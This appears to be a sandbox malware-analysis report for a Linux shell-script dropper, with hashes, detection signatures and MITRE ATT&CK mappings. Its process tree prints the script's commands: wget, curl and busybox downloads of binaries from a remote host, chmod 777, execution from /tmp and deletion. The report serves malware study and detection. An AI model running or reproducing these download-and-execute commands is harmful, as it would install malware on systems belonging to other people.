fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643

Analysis

max time kernel
149s
max time network
150s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
25-11-2024 03:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh
Size

10KB
MD5

6c09eb71153401505db1f0137c0ce2f0
SHA1

848f84c042cbff06e65bec859294eb9a4e9189e5
SHA256

fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643
SHA512

5f655607a73c92ca62488108d9f97a1ef1ccdad5a30011bcc58bb49f4f79baa455dc763ff692713680849ed9c07e4d6d9d4a660d7dd29fafb4d111b0e2f83c9f
SSDEEP

192:LAhAUhRUWMX7CXxFfjOFlN6iZmfjOFlSAUhRUWi:LAhAUhWWM+Xxo6DAUhWWi

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmod

pid process

742 chmod
Executes dropped EXE 1 IoCs

Processes:

BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW

ioc pid process

/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW 743 BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
Reads runtime system information 2 IoCs
Reads data from /proc virtual filesystem.
discovery

Processes:

curlcurl

description ioc process

File opened for reading /proc/sys/crypto/fips_enabled curl
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

curlbusyboxwgetcurlwget

pid process

737 curl
741 busybox
745 wget
824 curl
718 wget
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

curl

description ioc process

File opened for modification /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW curl

pid	process
742	chmod

ioc	pid	process
/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	743	BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

pid	process
737	curl
741	busybox
745	wget
824	curl
718	wget

description	ioc	process
File opened for modification	/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	curl

/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh
/tmp/fe3954bd61e2b9727ab37f057909fb0de12b5e1d1b8665afd73ad2a35039f643.sh
1⤵
PID:710
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:714
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - System Network Configuration Discovery
  PID:718
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:737
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - System Network Configuration Discovery
  PID:741
- /bin/chmod
  chmod 777 BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  ./BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Executes dropped EXE
  PID:743
- /bin/rm
  rm BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:744
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - System Network Configuration Discovery
  PID:745
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit